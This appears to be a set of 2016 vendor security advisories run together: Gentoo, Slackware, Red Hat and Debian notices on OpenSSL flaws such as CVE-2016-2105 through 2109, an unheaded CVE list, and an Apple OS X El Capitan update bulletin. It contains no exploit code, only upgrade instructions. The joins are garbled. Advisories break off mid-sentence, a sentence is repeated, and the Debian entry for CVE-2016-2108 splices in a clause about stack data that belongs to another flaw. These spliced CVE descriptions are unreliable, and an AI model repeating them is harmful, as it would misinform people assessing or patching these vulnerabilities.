r299068\nreleng/10.2/ r299067\nreleng/10.3/ r299066\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:https://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201612-16\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: December 07, 2016\n Bugs: #581234, #585142, #585276, #591454, #592068, #592074,\n #592082, #594500, #595186\n ID: 201612-16\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, the worst of which\nallows attackers to conduct a time based side-channel attack. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.2j \u003e= 1.0.2j\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review\nthe CVE identifiers and the International Association for Cryptologic\nResearch\u0027s (IACR) paper, \"Make Sure DSA Signing Exponentiations Really\nare Constant-Time\" for further details. Additionally, a time based side-channel\nattack may allow a local attacker to recover a private DSA key. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.2j\"\n\nReferences\n==========\n\n[ 1 ] CVE-2016-2105\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105\n[ 2 ] CVE-2016-2106\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106\n[ 3 ] CVE-2016-2107\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107\n[ 4 ] CVE-2016-2108\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108\n[ 5 ] CVE-2016-2109\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109\n[ 6 ] CVE-2016-2176\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176\n[ 7 ] CVE-2016-2177\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177\n[ 8 ] CVE-2016-2178\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178\n[ 9 ] CVE-2016-2180\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180\n[ 10 ] CVE-2016-2183\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183\n[ 11 ] CVE-2016-6304\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304\n[ 12 ] CVE-2016-6305\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305\n[ 13 ] CVE-2016-6306\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306\n[ 14 ] CVE-2016-7052\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052\n[ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time\n http://eprint.iacr.org/2016/594.pdf\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201612-16\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1t-i486-1_slack14.1.txz: Upgraded. \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1t-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1t-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1t-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1t-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1t-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1t-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2h-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2h-i586-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2h-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2h-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 packages:\n033bd9509aeb07712e6bb3adf89c18e4 openssl-1.0.1t-i486-1_slack14.0.txz\n9e91d781e33f7af80cbad08b245e84ed openssl-solibs-1.0.1t-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\ne5c77ec16e3f2fcb2f1d53d84a6ba951 openssl-1.0.1t-x86_64-1_slack14.0.txz\n2de7b6196a905233036d7f38008984bd openssl-solibs-1.0.1t-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n96dcae05ae2f585c30de852a55eb870f openssl-1.0.1t-i486-1_slack14.1.txz\n59618b061e62fd9d73ba17df7626b2e7 openssl-solibs-1.0.1t-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\n3d5ebfce099917703d537ab603e58a9b openssl-1.0.1t-x86_64-1_slack14.1.txz\nbf3a6bbdbe835dd2ce73333822cc9f06 openssl-solibs-1.0.1t-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n4889a10c5f3aa7104167c7d50eedf7ea a/openssl-solibs-1.0.2h-i586-1.txz\n8e3439f35c3cb4e11ca64eebb238a52f n/openssl-1.0.2h-i586-1.txz\n\nSlackware x86_64 -current packages:\nb4a852bb7e86389ec228288ccb7e79bb a/openssl-solibs-1.0.2h-x86_64-1.txz\nbcf9dc7bb04173f002644e3ce33ab4ab n/openssl-1.0.2h-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1t-i486-1_slack14.1.txz openssl-solibs-1.0.1t-i486-1_slack14.1.txz \n\nThen, reboot the machine or restart any network services that use OpenSSL. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2016:0996-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-0996.html\nIssue date: 2016-05-10\nCVE Names: CVE-2016-0799 CVE-2016-2105 CVE-2016-2106 \n CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 \n CVE-2016-2842 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nSecurity Fix(es):\n\n* A flaw was found in the way OpenSSL encoded certain ASN.1 data\nstructures. An attacker could use this flaw to create a specially crafted\ncertificate which, when verified or re-encoded by OpenSSL, could cause it\nto crash, or execute arbitrary code using the permissions of the user\nrunning an application compiled against the OpenSSL library. \n(CVE-2016-2108)\n\n* Two integer overflow flaws, leading to buffer overflows, were found in\nthe way the EVP_EncodeUpdate() and EVP_EncryptUpdate() functions of OpenSSL\nparsed very large amounts of input data. A remote attacker could use these\nflaws to crash an application using OpenSSL or, possibly, execute arbitrary\ncode with the permissions of the user running that application. \n(CVE-2016-2105, CVE-2016-2106)\n\n* It was discovered that OpenSSL leaked timing information when decrypting\nTLS/SSL and DTLS protocol encrypted records when the connection used the\nAES CBC cipher suite and the server supported AES-NI. A remote attacker\ncould possibly use this flaw to retrieve plain text from encrypted packets\nby using a TLS/SSL or DTLS server as a padding oracle. (CVE-2016-2107)\n\n* Several flaws were found in the way BIO_*printf functions were\nimplemented in OpenSSL. Applications which passed large amounts of\nuntrusted data through these functions could crash or potentially execute\ncode with the permissions of the user running such an application. \n(CVE-2016-0799, CVE-2016-2842)\n\n* A denial of service flaw was found in the way OpenSSL parsed certain\nASN.1-encoded data from BIO (OpenSSL\u0027s I/O abstraction) inputs. An\napplication using OpenSSL that accepts untrusted ASN.1 BIO input could be\nforced to allocate an excessive amount of data. (CVE-2016-2109)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2016-2108, CVE-2016-2842, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107,\nand CVE-2016-0799. Upstream acknowledges Huzaifa Sidhpurwala (Red Hat),\nHanno B\u00f6ck, and David Benjamin (Google) as the original reporters of\nCVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2842,\nCVE-2016-2105, CVE-2016-2106, and CVE-2016-0799; and Juraj Somorovsky as\nthe original reporter of CVE-2016-2107. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1312219 - CVE-2016-0799 OpenSSL: Fix memory issues in BIO_*printf functions\n1314757 - CVE-2016-2842 openssl: doapr_outch function does not verify that certain memory allocation succeeds\n1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data\n1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder\n1331426 - CVE-2016-2107 openssl: Padding oracle in AES-NI CBC MAC check\n1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow\n1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.1.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.1.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\n\nppc64:\nopenssl-1.0.1e-48.el6_8.1.ppc.rpm\nopenssl-1.0.1e-48.el6_8.1.ppc64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.ppc.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.ppc64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.ppc.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-48.el6_8.1.s390.rpm\nopenssl-1.0.1e-48.el6_8.1.s390x.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.s390.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.s390x.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.s390.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.1.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.ppc64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.ppc64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.s390x.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.s390x.rpm\nopenssl-static-1.0.1e-48.el6_8.1.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.1.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.1.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-0799\nhttps://access.redhat.com/security/cve/CVE-2016-2105\nhttps://access.redhat.com/security/cve/CVE-2016-2106\nhttps://access.redhat.com/security/cve/CVE-2016-2107\nhttps://access.redhat.com/security/cve/CVE-2016-2108\nhttps://access.redhat.com/security/cve/CVE-2016-2109\nhttps://access.redhat.com/security/cve/CVE-2016-2842\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFXMXPXXlSAg2UNWIIRAmqpAJ4sxaxPc4fbLjR32h/PW1fxwOZG7ACgtaSz\n6dbI0EemYRoHCDagPHSycq4=\n=g2Zb\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. This could lead to a heap corruption. \n This could lead to a heap corruption. \n\nCVE-2016-2108\n\n David Benjamin from Google discovered that two separate bugs in the\n ASN.1 encoder, related to handling of negative zero integer values\n and large universal tags, could lead to an out-of-bounds write. This could result in arbitrary stack data\n being returned in the buffer. \n\nAdditional information about these issues can be found in the OpenSSL\nsecurity advisory at https://www.openssl.org/news/secadv/20160503.txt\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1k-3+deb8u5. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.2h-1. \n\nWe recommend that you upgrade your openssl packages. \n\nReferences:\n\n - CVE-2016-2107 - OpenSSL, Unauthorized disclosure of information\n - CVE-2016-2106 - OpenSSL, Denial of Service (DoS)\n - CVE-2016-2109 - OpenSSL, Denial of Service (DoS)\n - CVE-2016-2105 - OpenSSL, Denial of Service (DoS)\n - CVE-2016-3739 - cURL and libcurl, Remote code execution\n - CVE-2016-5388 - \"HTTPoxy\", Apache Tomcat\n - CVE-2016-5387 - \"HTTPoxy\", Apache HTTP Server\n - CVE-2016-5385 - \"HTTPoxy\", PHP \n - CVE-2016-4543 - PHP, multiple impact\n - CVE-2016-4071 - PHP, multiple impact\n - CVE-2016-4072 - PHP, multiple impact\n - CVE-2016-4542 - PHP, multiple impact\n - CVE-2016-4541 - PHP, multiple impact\n - CVE-2016-4540 - PHP, multiple impact\n - CVE-2016-4539 - PHP, multiple impact\n - CVE-2016-4538 - PHP, multiple impact\n - CVE-2016-4537 - PHP, multiple impact\n - CVE-2016-4343 - PHP, multiple impact\n - CVE-2016-4342 - PHP, multiple impact\n - CVE-2016-4070 - PHP, Denial of Service (DoS)\n - CVE-2016-4393 - PSRT110263, XSS vulnerability\n - CVE-2016-4394 - PSRT110263, HSTS vulnerability\n - CVE-2016-4395 - ZDI-CAN-3722, PSRT110115, Buffer Overflow\n - CVE-2016-4396 - ZDI-CAN-3730, PSRT110116, Buffer Overflow\n - PSRT110145\n - PSRT110263\n - PSRT110115\n - PSRT110116\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update\n2016-004\n\nOS X El Capitan v10.11.6 and Security Update 2016-004 is now\navailable and addresses the following:\n\napache_mod_php\nAvailable for: \nOS X Yosemite v10.10.5 and OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in PHP versions prior to\n5.5.36. These were addressed by updating PHP to version 5.5.36. \nCVE-2016-4650\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-2016-4647 : Juwei Lin (@fuzzerDOTcn) of Trend Micro\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to determine kernel memory layout\nDescription: An out-of-bounds read was addressed through improved\ninput validation. \nCVE-2016-4648 : Juwei Lin(@fuzzerDOTcn) of Trend Micro\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Parsing a maliciously crafted audio file may lead to the\ndisclosure of user information\nDescription: An out-of-bounds read was addressed through improved\nbounds checking. \nCVE-2016-4646 : Steven Seeley of Source Incite working with Trend\nMicro\u0027s Zero Day Initiative\n\nAudio\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a system denial of service\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-4649 : Juwei Lin(@fuzzerDOTcn) of Trend Micro\n\nbsdiff\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local attacker may be able to cause unexpected application\ntermination or arbitrary code execution\nDescription: An integer overflow existed in bspatch. This issue was\naddressed through improved bounds checking. \nCVE-2014-9862 : an anonymous researcher\n\nCFNetwork\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to view sensitive user information\nDescription: A permissions issue existed in the handling of web\nbrowser cookies. This issue was addressed through improved\nrestrictions. \nCVE-2016-4645 : Abhinav Bansal of Zscaler Inc. \n\nCoreGraphics\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: A memory corruption issue was addressed through\nimproved memory handling. \nCVE-2016-4637 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nCoreGraphics\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to elevate privileges\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed through improved\ninput validation. \nCVE-2016-4652 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nFaceTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: An attacker in a privileged network position may be able to\ncause a relayed call to continue transmitting audio while appearing\nas if the call terminated\nDescription: User interface inconsistencies existed in the handling\nof relayed calls. These issues were addressed through improved\nFaceTime display logic. \nCVE-2016-4635 : Martin Vigo\n\nGraphics Drivers\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4634 : Stefan Esser of SektionEins\n\nImageIO\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to cause a denial of service\nDescription: A memory consumption issue was addressed through\nimproved memory handling. \nCVE-2016-4632 : Evgeny Sidorov of Yandex\n\nImageIO\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4631 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nImageIO\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4629 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\nCVE-2016-4630 : Tyler Bohan of Cisco Talos (talosintel.com\n/vulnerability-reports)\n\nIntel Graphics Driver\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode with kernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4633 : an anonymous researcher\n\nIOHIDFamily\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-4626 : Stefan Esser of SektionEins\n\nIOSurface\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: A use-after-free was addressed through improved memory\nmanagement. \nCVE-2016-4625 : Ian Beer of Google Project Zero\n\nKernel\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1863 : Ian Beer of Google Project Zero\nCVE-2016-1864 : Ju Zhu of Trend Micro\nCVE-2016-4582 : Shrek_wzw and Proteas of Qihoo 360 Nirvan Team\n\nKernel\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a system denial of service\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-1865 : CESG, Marco Grassi (@marcograss) of KeenLab\n(@keen_lab), Tencent\n\nlibc++abi\nAvailable for: OS X El Capitan v10.11 and later\nImpact: An application may be able to execute arbitrary code with\nroot privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4621 : an anonymous researcher\n\nlibexpat\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-0718 : Gustavo Grieco\n\nLibreSSL\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in LibreSSL before 2.2.7. These\nwere addressed by updating LibreSSL to version 2.2.7. \nCVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google) Mark Brand,\nIan Beer of Google Project Zero\nCVE-2016-2109 : Brian Carpenter\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Parsing a maliciously crafted XML document may lead to\ndisclosure of user information\nDescription: An access issue existed in the parsing of maliciously\ncrafted XML files. This issue was addressed through improved input\nvalidation. \nCVE-2016-4449 : Kostya Serebryany\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Multiple vulnerabilities in libxml2\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-4447 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-4448 : Apple\nCVE-2016-4483 : Gustavo Grieco\nCVE-2016-4614 : Nick Wellnhofe\nCVE-2016-4615 : Nick Wellnhofer\nCVE-2016-4616 : Michael Paddon\nCVE-2016-4619 : Hanno Boeck\n\nlibxslt\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Multiple vulnerabilities in libxslt\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1684 : Nicolas GrA(c)goire\nCVE-2016-4607 : Nick Wellnhofer\nCVE-2016-4608 : Nicolas GrA(c)goire\nCVE-2016-4609 : Nick Wellnhofer\nCVE-2016-4610 : Nick Wellnhofer\nCVE-2016-4612 : Nicolas GrA(c)goire\n\nLogin 